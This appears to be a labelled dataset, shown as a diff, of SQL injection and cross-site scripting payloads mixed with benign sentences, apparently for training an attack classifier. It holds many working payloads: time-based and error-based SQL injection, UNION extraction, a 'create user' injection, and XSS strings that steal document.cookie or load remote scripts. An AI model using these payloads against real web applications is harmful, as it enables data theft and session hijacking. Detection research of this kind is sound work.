0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ""imlx"" = ""imlx",2,SQLi,13534 -"-2434 ) union all select 8310,8310,8310,8310,8310--",2,SQLi,16070 -"select * from users where id = 1 or ""{."" or 1 = 1 -- 1",2,SQLi,11607 -"1%' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( '%' = '",2,SQLi,17785 -"<audio onkeyup=""alert(1)"" contenteditable>test</audio>",1,XSS,8850 -<var onblur=alert(1) tabindex=1 id=x></var><input autofocus>,1,XSS,4732 -"1%"" ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,22490 -"1%' ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,17015 -javas<!-- -->cript:alert(''),1,XSS,5181 -"<style>@keyframes x{}</style><rp style=""animation-name:x"" onanimationstart=""alert(1)""></rp>",1,XSS,8483 -"&lt;SCRIPT/XSS SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1046 -Join us for lunch.,0,normal,22959 -"or 1=1 – -or 1=1--",2,SQLi,10037 -"1 where 8908 = 8908 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,21906 -"1' ) as ljpy where 8270 = 8270 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,22400 -tan,0,normal,23397 -Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser,1,XSS,994 -"1"" ) where 1673 = 1673 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12845 -"{""id"":null,""name"":""Charmander""}",0,normal,25677 -"{""id"":null,""firstName"":""Meiyuke"",""lastName"":""Soh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25609 -"<dir onkeyup=""alert(1)"" contenteditable>test</dir>",1,XSS,4602 -"1' ) as vlwh where 9403 = 9403 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16870 -1' ) where 4364 = 4364 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16230 -"1"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,12759 -Where did you find that stylish boutique?,0,normal,23904 -1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7873 ) +',2,SQLi,14419 -"<video><source onerror=""javascript:alert(1)"">//INJECTX",1,XSS,9894 -"1 ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19532 -<set onpointerover=alert(1)>XSS</set>,1,XSS,4340 -"-6987' union all select 4721,4721--",2,SQLi,19807 -"1'+ ( select acax where 4169 = 4169 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) +'",2,SQLi,18907 -%253Cscript%253Ealert('XSS')%253C%252Fscript%253E,1,XSS,432 -"<dir onmouseup=""alert(1)"">test</dir>",1,XSS,7701 -"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'gxpr' = 'gxpr",2,SQLi,14777 -ORDER BY 23--,2,SQLi,10300 -"<dfn onkeypress=""alert(1)"" contenteditable>test</dfn>",1,XSS,7883 -"1"" ) ) as bosq where 4695 = 4695",2,SQLi,16671 -<center onpointermove=alert(1)>XSS</center>,1,XSS,4000 -<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus>,1,XSS,4922 -select case when 6229 = 2077 then 1 else null end--,2,SQLi,12659 -"1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'vkde' = 'vkde",2,SQLi,22219 -%3Cimg/src=%3Dx+onload=alert(2)%3D,1,XSS,9780 -or 1 = 1/*,2,SQLi,11479 -"><script+src=https://wb.amap.com/channel.php?callback=alert(1337)""></script>",1,XSS,9846 -Let's choose a book for our reading group.,0,normal,23964 -Join team.,0,normal,23274 -"1' ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'rfln' = 'rfln",2,SQLi,13252 -"<Video> <source onerror = ""javascript: alert ()"">",1,XSS,5216 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,12100 -"{""id"":null,""name"":""definition""}",0,normal,25522 -"<dfn onkeyup=""alert(1)"" contenteditable>test</dfn>",1,XSS,8605 -1' ) where 2808 = 2808,2,SQLi,19313 -<head onblur=alert(1) tabindex=1 id=x></head><input autofocus>,1,XSS,7802 -"<style>:target {color: red;}</style><bgsound id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></bgsound>",1,XSS,5810 -"1"" ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,20512 -"1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'rgue' like 'rgue",2,SQLi,15337 -Let's choose a destination for our getaway.,0,normal,23990 -"1"" and ( 3020 = 3020 ) *6703 and ""tnzp"" like ""tnzp",2,SQLi,19809 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13",2,SQLi,10636 -"<style>:target {color: red;}</style><object id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></object>",1,XSS,2778 -"1' ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( 'oxvd' like 'oxvd",2,SQLi,19489 -1 ) ) ) and sleep ( 5 ) #,2,SQLi,19164 -Select pick.,0,normal,24744 -"<tt onmousemove=""alert(1)"">test</tt>",1,XSS,8442 -to_timestamp_tz,2,SQLi,22634 -"<frameset oncopy=""alert(1)"" contenteditable>test</frameset>",1,XSS,6957 -end and ( 4610 = 4610,2,SQLi,15674 -<big onpointermove=alert(1)>XSS</big>,1,XSS,8104 -"<frameset onmouseout=""alert(1)"">test</frameset>",1,XSS,3789 -"&lt;BGSOUND SRC=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,935 -"1 where 3535 = 3535 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16856 -"{""id"":null,""firstName"":""Azahari"",""lastName"":""Ab Manap"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26071 -"1 ) as ihan where 5298 = 5298 and elt ( 6587 = 3479,3479 ) --",2,SQLi,16907 -%2A%7C,2,SQLi,10203 -Select a topic for the discussion.,0,normal,24306 -<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>,1,XSS,5415 -"1"" ) as hsws where 6656 = 6656",2,SQLi,17662 -"<img src=x\x13onerror=""javascript:alert(1)"">",1,XSS,632 -[notmalicious](javascript:window.onerror=alert;throw%20document.cookie),1,XSS,9442 -1'+ ( select 'zjvx' where 4683 = 4683 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) +',2,SQLi,15286 -select ( case when ( 5914 = 2314 ) then 5914 else 1/ ( select 0 ) end ) --,2,SQLi,17468 -"<kbd onkeypress=""alert(1)"" contenteditable>test</kbd>",1,XSS,5315 -"<body onmousemove=""alert(1)"">test</body>",1,XSS,5722 -"{""id"":null,""firstName"":""Frank"",""lastName"":""Lay"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25515 -I'm thinking of where to attend a workshop.,0,normal,24026 -"1' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'kqqf' = 'kqqf",2,SQLi,22290 -"-6681"" ) or 5251 = 1162",2,SQLi,17549 -select ( case when ( 8234 = 2498 ) then 8234 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,16318 -Can't select that.,0,normal,24603 -&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;,1,XSS,1054 -"1%"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,17947 --7072' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,18284 -Select finish.,0,normal,24766 -1 ) as jtfx where 8038 = 8038,2,SQLi,16977 -"1' ) ) as nuku where 7009 = 7009 union all select null,null,null,null,null#",2,SQLi,17497 -onPopState,1,XSS,9694 -create user name identified by 'pass123' --,2,SQLi,10086 -"<ul draggable=""true"" ondragenter=""alert(1)"">test</ul>",1,XSS,5577 -"<style>@keyframes slidein {}</style><textarea style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></textarea>",1,XSS,5204 -"1"" ) as tecq where 4817 = 4817 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,14807 -"><img src=x onerror=alert('XSS');> -><img src=x onerror=alert(String.fromCharCode(88,83,83));>",1,XSS,9738 --6233' ) where 9820 = 9820 or 3038 = 3038,2,SQLi,12468 -"-6815 where 7609 = 7609 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,14671 -"<section onkeyup=""alert(1)"" contenteditable>test</section>",1,XSS,6970 -1%' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and '%' = ',2,SQLi,16382 -"-2028' ) ) ) union all select 8698,8698,8698,8698#",2,SQLi,14865 -"<style>:target {color:red;}</style><dd id=x style=""transition:color 1s"" ontransitionend=alert(1)></dd>",1,XSS,7213 -"1"" ) as ranl where 5553 = 5553",2,SQLi,20747 -"-9820"" or 1038 = 7502#",2,SQLi,17380 -"-4095' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,19005 +"1"" ) and make_set ( 4539 = 6401,6401 ) and ( ""kglx"" = ""kglx",2,SQLi,14251 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and '%' = '",2,SQLi,13905 +"1'|| ( select 'lije' from dual where 5309 = 5309 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,13836 +"1%"" ) union all select null,null,null,null,null,null,null,null#",2,SQLi,22045 +"<dt draggable=""true"" ondragleave=""alert(1)"">test</dt>",1,XSS,8798 +"<multicol onbeforecopy=""alert(1)"" contenteditable>test</multicol>",1,XSS,3002 +Chu would select the next clue.,0,normal,26240 +"1"" ) as yzzk where 1813 = 1813 and ( 3020 = 3020 ) *6703--",2,SQLi,19985 +<small id=x tabindex=1 onbeforeactivate=alert(1)></small>,1,XSS,2603 +"<bdi onmouseup=""alert(1)"">test</bdi>",1,XSS,2759 +"<style>:target {color:red;}</style><nav id=x style=""transition:color 1s"" ontransitionend=alert(1)></nav>",1,XSS,8823 +"<isindex oncontextmenu=""alert(1)"">test</isindex>",1,XSS,4864 +"1 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,18518 +-4215 ) where 5782 = 5782 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,22365 +"<div draggable=""true"" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary>",1,XSS,4111 +<ol id=x tabindex=1 onactivate=alert(1)></ol>,1,XSS,6113 +Select decline.,0,normal,24545 +<dialog id=x tabindex=1 onactivate=alert(1)></dialog>,1,XSS,8059 +"<body onLoad=""alert('XSS');""",1,XSS,1242 +"1 ) union all select null,null,null--",2,SQLi,17091 +"<div id=""x"">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>",1,XSS,665 +"<address draggable=""true"" ondragend=""alert(1)"">test</address>",1,XSS,4334 +"<frameset oncut=""alert(1)"" contenteditable>test</frameset>",1,XSS,7013 +"1%"" ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15574 +"<span draggable=""true"" ondragstart=""alert(1)"">test</span>",1,XSS,6770 +"1%"" ) ) ) and 2006 = 2006",2,SQLi,20691 +Create a unique painting.,0,normal,22612 +"1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,16526 +Sort alphabet blocks.,0,normal,22765 +1 where 2301 = 2301,2,SQLi,19545 +"<style>@keyframes slidein {}</style><basefont style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></basefont>",1,XSS,8065 +<link onpointerup=alert(1)>XSS</link>,1,XSS,8424 +"<div draggable=""true"" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption>",1,XSS,7030 +1' ) as qcse where 4147 = 4147 waitfor delay '0:0:5'--,2,SQLi,12803 +"-3637"" or ( 8459 = 8459 ) *4906",2,SQLi,12535 +Sort results where required.,0,normal,23300 +Let's explore where the art museum is located.,0,normal,23950 +"1%' ) union all select null,null,null,null,null#",2,SQLi,15815 +1 ) as uuro where 6784 = 6784,2,SQLi,18665 +<source id=x tabindex=1 onactivate=alert(1)></source>,1,XSS,2989 +"1' ) ) as gqzy where 2312 = 2312 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20590 +select sleep ( 5 ) and ( 'pwpc' = 'pwpc,2,SQLi,21541 +"select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1",2,SQLi,11861 +"1"" ) as rovd where 3764 = 3764 and elt ( 4249 = 4249,7259 ) --",2,SQLi,12797 +"1"" ) ) ) and ( 7758 = 4628 ) *4628 and ( ( ( ""wzas"" = ""wzas",2,SQLi,15644 +1%' ) ) waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,19511 +-8777%' ) ) ) or ( 3934 = 2025 ) *2025 and ( ( ( '%' = ',2,SQLi,16256 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,10993 +""",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10780 +"-9156' ) ) union all select 9110,9110,9110,9110#",2,SQLi,13985 +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus>,1,XSS,3036 +"1 ) where 9724 = 9724 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,21841 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( '%' = '",2,SQLi,12383 +<button onReverse=javascript:alert(1)>,1,XSS,9623 +"<div draggable=""true"" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span>",1,XSS,3384 +"<command onbeforecut=""alert(1)"" contenteditable>test</command>",1,XSS,8410 +"1 where 5929 = 5929 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12649 +"-6186' in boolean mode ) union all select 2990,2990,2990#",2,SQLi,20559 +Students who locate audio tapes or CDs of Civil War music may select songs to enhance The Civil War American Civil War.,0,normal,25480 +1' ) ) as qswu where 6377 = 6377,2,SQLi,16759 +"<iframe onLoad iframe onLoad=""javascript:javascript:alert(1)""></iframe onLoad>",1,XSS,352 +Let's find out where the jazz concert is.,0,normal,23795 +"><script+src=http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()""></script>",1,XSS,9748 +Filter the search results.,0,normal,22553 +<font style='color:expression(alert(document.cookie))'>,1,XSS,1238 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></noscript>",1,XSS,4016 +<script>a=/XSS/\ndocument.vulnerable=true;</script>,1,XSS,1424 +"1' where 6853 = 6853 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,21624 +"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 7182 = 7182",2,SQLi,21357 +<discard onpointerout=alert(1)>XSS</discard>,1,XSS,8183 +Merge the two lists.,0,normal,22525 +-9653' ) where 2705 = 2705 or 9323 = 9323#,2,SQLi,18265 +"<div draggable=""true"" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form>",1,XSS,8857 +"1"" ) as nraw where 7984 = 7984 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,21382 +<button onBeforeCopy=javascript:alert(1)>,1,XSS,9545 +select ( case when ( 4297 = 9086 ) then 4297 else 1/ ( select 0 ) end ) --,2,SQLi,20949 +"1%"" or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ""%"" = """,2,SQLi,18763 +-4900' ) ) or 7208 = 3236,2,SQLi,16228 +<button onInput=javascript:alert(1)>,1,XSS,9586 +Let's find out where the historical site is.,0,normal,23760 +"<IMG SRC=x onblur=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1140 +"&lt;STYLE&gt;li {list-style-image&#58; url(\""javascript&#058;alert('XSS')\"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS",1,XSS,944 +"1"" ) ) as kmss where 3214 = 3214 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12645 +"select sleep ( 5 ) and ( ""%"" = """,2,SQLi,13540 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15",2,SQLi,10496 +1 ) ) as foul where 4361 = 4361 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,16898 +"<a href=""javas\x02cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,414 +1' ) as lgex where 4068 = 4068 and 1378 = 9247--,2,SQLi,19409 +"<col onmouseleave=""alert(1)"">test</col>",1,XSS,6879 +1 ) ) ) rlike sleep ( 5 ) #,2,SQLi,22374 +"<main onbeforepaste=""alert(1)"" contenteditable>test</main>",1,XSS,8800 +1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,20690 +1%' and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,17606 +"<kbd onkeyup=""alert(1)"" contenteditable>test</kbd>",1,XSS,8343 +"1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'lxoc' = 'lxoc",2,SQLi,18676 +<basefont onpointerup=alert(1)>XSS</basefont>,1,XSS,1823 +1 ) where 9307 = 9307,2,SQLi,20240 +"<tfoot onmouseover=""alert(1)"">test</tfoot>",1,XSS,3173 +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus>,1,XSS,3338 +"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""%"" = """,2,SQLi,13515 +"<ruby onmouseup=""alert(1)"">test</ruby>",1,XSS,2708 +"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ""cxsu"" like ""cxsu",2,SQLi,14760 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--",2,SQLi,10670 +"1"" ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""frgb"" like ""frgb",2,SQLi,13776 +",NULL)%20waitfor%20delay%20'0:0:20'%20/* +,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,22470 +"<dt oncontextmenu=""alert(1)"">test</dt>",1,XSS,3264 +"<code oncut=""alert(1)"" contenteditable>test</code>",1,XSS,4373 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,10440 +"1' and make_set ( 9860 = 6956,6956 ) and 'toru' = 'toru",2,SQLi,22333 +"<small onmouseup=""alert(1)"">test</small>",1,XSS,8275 +"<meta onmouseleave=""alert(1)"">test</meta>",1,XSS,4750 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ""vqpx"" like ""vqpx",2,SQLi,19194 +"1%"" ) ) union all select null,null,null,null,null,null--",2,SQLi,20294 +"1%"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19866 +Let's explore where the river flows from.,0,normal,23727 +if ( 8537 = 7034 ) select 8537 else drop function vqmp--,2,SQLi,12762 +word1,0,normal,26503 +"</math>//[""'`-->]]>]</div>",1,XSS,8978 +<img onpointerenter=alert(1)>XSS</img>,1,XSS,8892 +as,2,SQLi,10022 +Insert the missing puzzle piece.,0,normal,22522 +"<style>@keyframes x{}</style><dd style=""animation-name:x"" onanimationstart=""alert(1)""></dd>",1,XSS,2153 +"-8950"" ) ) as uahs where 2113 = 2113 union all select 2113,2113,2113,2113,2113,2113,2113,2113,2113,2113#",2,SQLi,12302 +"1"" ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""rvuz"" like ""rvuz",2,SQLi,20357 +"<style>@keyframes x{}</style><div style=""animation-name:x"" onanimationstart=""alert(1)""></div>",1,XSS,6947 +"-4222' ) union all select 9267,9267,9267,9267,9267,9267--",2,SQLi,13765 +"<div draggable=""true"" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid>",1,XSS,5269 +"-7868' in boolean mode ) union all select 5117,5117,5117,5117,5117,5117,5117,5117,5117#",2,SQLi,14284 +-2100' where 9260 = 9260 or 3038 = 3038,2,SQLi,13062 +"<li onclick=""alert(1)"">test</li>",1,XSS,3296 +"1' ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'pgyl' = 'pgyl",2,SQLi,14536 +<label onpointerup=alert(1)>XSS</label>,1,XSS,6280 +"1"" ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,21802 +"-6595"" order by 1--",2,SQLi,16852 +"<canvas onmousemove=""alert(1)"">test</canvas>",1,XSS,1770 +"1' in boolean mode ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,18612 +<nextid onpointerup=alert(1)>XSS</nextid>,1,XSS,6727 +Plant a shady tree.,0,normal,22545 +"AND 1=0 UNION ALL SELECT "", 81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,9910 +"1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""oxvs"" like ""oxvs",2,SQLi,20169 +"<object onmousedown=""alert(1)"">test</object>",1,XSS,1749 +<picture onpointerup=alert(1)>XSS</picture>,1,XSS,2242 +Where's the cottage?,0,normal,23524 +1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'ulkq' = 'ulkq,2,SQLi,19465 +-7552 or 6872 = 6872,2,SQLi,20775 "<TABLE><TD BACKGROUND=""javascript:javascript:alert(1)"">",1,XSS,716 -"alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--",1,XSS,753 -"<spacer onkeyup=""alert(1)"" contenteditable>test</spacer>",1,XSS,4794 -1' ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'smrw' like 'smrw,2,SQLi,12381 -"1' ) ) as xntz where 5801 = 5801 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,12704 -Where is the query stored?,0,normal,23558 -Filter search results.,0,normal,22992 -<bdo onpointerover=alert(1)>XSS</bdo>,1,XSS,7610 -"-1337"" ) union all select 7508--",2,SQLi,15932 -"1"" ) ) as lomw where 9257 = 9257 union all select null,null,null,null,null,null--",2,SQLi,12280 -1' ) ) and sleep ( 5 ) and ( ( 'jiio' like 'jiio,2,SQLi,13961 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#",2,SQLi,10657 -"<frameset onkeydown=""alert(1)"" contenteditable>test</frameset>",1,XSS,2728 -"1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""gozk"" = ""gozk",2,SQLi,15405 -"<label onmousemove=""alert(1)"">test</label>",1,XSS,3782 -"<u onmouseenter=""alert(1)"">test</u>",1,XSS,7931 -Select a workout that challenges you.,0,normal,24184 -"<hgroup onkeydown=""alert(1)"" contenteditable>test</hgroup>",1,XSS,8359 -select ( case when ( 1726 = 4080 ) then 1726 else 1/ ( select 0 ) end ) --,2,SQLi,22192 -"-7802' ) ) ) or elt ( 8778 = 9974,9974 ) and ( ( ( 'glsq' like 'glsq",2,SQLi,18664 -"</title><script>$=1,alert($)</script>",1,XSS,9486 -1 ) as mpnj where 5049 = 5049,2,SQLi,22352 -<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus>,1,XSS,6869 